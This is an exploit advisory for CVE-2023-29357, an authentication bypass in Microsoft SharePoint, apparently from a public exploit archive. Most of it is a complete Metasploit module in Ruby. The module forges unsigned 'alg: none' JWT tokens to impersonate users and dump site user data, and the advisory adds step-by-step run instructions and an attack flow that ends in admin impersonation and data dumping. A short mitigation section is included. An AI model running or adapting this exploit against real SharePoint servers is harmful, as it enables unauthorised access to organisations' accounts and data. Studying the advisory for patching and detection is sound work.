============================================================================================================================================= | # Title : SharePoint Authentication Bypass | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration | ============================================================================================================================================= POC : 1. Summary : a critical authentication bypass vulnerability in Microsoft SharePoint known as CVE‑2023‑29357. (https://packetstorm.news/files/id/207960/) The flaw allows an attacker to craft an unsigned JWT token with "alg": "none" and impersonate any SharePoint user, including Site Administrators, without possessing valid credentials. The vulnerability is dangerous because it exposes internal SharePoint APIs and may enable privilege escalation or full system compromise. ------------------------- How to Run the Exploit ------------------------- ### **1. Save the script** Save the code as: ~/.msf4/modules/auxiliary/sharepoint/cve_2023_29357.rb ### **2. Start it from terminal** msfconsole use auxiliary/sharepoint/cve_2023_29357 set RHOSTS https://target.com run ------------------------- auxiliary : ------------------------- ## # CVE‑2023‑29357 SharePoint Auth Bypass # by Indoushka ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'SharePoint Auth Bypass (CVE‑2023‑29357)', 'Description' => %q{ This module exploits an authentication bypass in Microsoft SharePoint (CVE‑2023‑29357) using a crafted JWT token with "alg":"none". }, 'Author' => [ 'Indoushka (Conversion to MSF)' ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2023-29357'] ] )) register_options( [ OptString.new('TARGETURI', [ true, 'Base SharePoint URL', '/' ]) ] ) end def create_jwt(aud, client_id) header = { alg: 'none' } now = Time.now.to_i payload = { aud: aud, iss: client_id, nbf: now, exp: now + 3600, ver: "hashedprooftoken", nameid: "#{client_id}@#{aud.split('@')[1]}", endpointurl: "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=", endpointurlLength: 1, isloopback: true } encoded_header = Rex::Text.encode_base64url(header.to_json) encoded_payload = Rex::Text.encode_base64url(payload.to_json) "#{encoded_header}.#{encoded_payload}.AAA" end def get_realm res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "_api/web/siteusers"), 'headers' => { 'Authorization' => 'Bearer ' } }, 3) return nil unless res&.code == 401 auth = res.headers['WWW-Authenticate'] return nil unless auth realm = auth[/realm=\"([^\"]+)\"/, 1] realm end def run client_id = "00000003-0000-0ff1-ce00-000000000000" print_status("[*] Fetching realm…") realm = get_realm if realm.nil? print_error("[-] Failed to extract realm") return end print_good("[+] Realm: #{realm}") aud = "#{client_id}@#{realm}" jwt = create_jwt(aud, client_id) print_status("[*] Trying authentication bypass…") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "_api/web/siteusers"), 'headers' => { 'Authorization' => "Bearer #{jwt}", 'X-PROOF_TOKEN' => jwt, 'Accept' => 'application/json' } }, 5) if res && res.code == 200 print_good("[+] Authentication bypass success!") if res.body print_line(res.body) end else print_error("[-] Bypass failed. HTTP #{res&.code}") end end end --------------------------------------------------------------------------------------------------------- [ Technical Description ] --------------------------------------------------------------------------------------------------------- • The attacker sends a request to: https://TARGET/_api/web/siteusers This forces SharePoint to respond with a 401 and expose the Realm value. • The Realm is extracted from the “WWW‑Authenticate” header: Bearer realm="XXXXXXXXXXXXXXXXXXXXXXXXXXXX" • The attacker forges a JWT token with: { "alg": "none" } • The “aud” field is constructed as: 00000003-0000-0ff1-ce00-000000000000@REALM • The forged token is sent to SharePoint REST API endpoints. • SharePoint incorrectly validates the token and treats the attacker as an authenticated user. The following module performs: 1. Realm extraction 2. Token forgery 3. Authentication bypass 4. Admin enumeration 5. Privilege validation Core logic excerpt (Metasploit Ruby): jwt_header = { alg: "none" }.to_json jwt_payload = { aud: "#{client_id}@#{realm}", iss: client_id, nbf: Time.now.to_i, exp: Time.now.to_i + 3600, ver: "hashedprooftoken", nameid: "#{client_id}@#{realm}", endpointurl: "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=", endpointurlLength: 1, isloopback: true }.to_json unsigned_token = "#{b64(jwt_header)}.#{b64(jwt_payload)}.AAA" send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('_api', 'web', 'currentuser'), 'headers' => { "Authorization" => "Bearer #{unsigned_token}", "X-PROOF_TOKEN" => unsigned_token } }) --------------------------------------------------------------------------------------------------------- [ Attack Flow ] --------------------------------------------------------------------------------------------------------- 1. Force 401 → Extract Realm 2. Build forged JWT 3. Bypass authentication 4. Enumerate site admins 5. Optional: Impersonate admin (SharePoint accepts spoofing) 6. Dump internal API data --------------------------------------------------------------------------------------------------------- [ Impact ] --------------------------------------------------------------------------------------------------------- ✔ Full user enumeration ✔ Admin identification ✔ Access to restricted SharePoint API routes ✔ Potential privilege escalation ✔ Ability to chain with RCE vulnerabilities (CVE‑2023‑24955) ✔ Data leakage (lists, documents, users, groups…) Severity: **CRITICAL** --------------------------------------------------------------------------------------------------------- [ Mitigation ] --------------------------------------------------------------------------------------------------------- • Install the official Microsoft patch • Enforce strict JWT signature verification • Reject any token with "alg:none" • Disable loopback trust token mode • Monitor ULS logs for abnormal access patterns --------------------------------------------------------------------------------------------------------- [ Conclusion ] --------------------------------------------------------------------------------------------------------- CVE‑2023‑29357 is a severe authentication bypass allowing attackers to impersonate any SharePoint user without credentials. The vulnerability is trivial to exploit and provides high‑value access to internal SharePoint data and admin functions. Patch immediately. Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================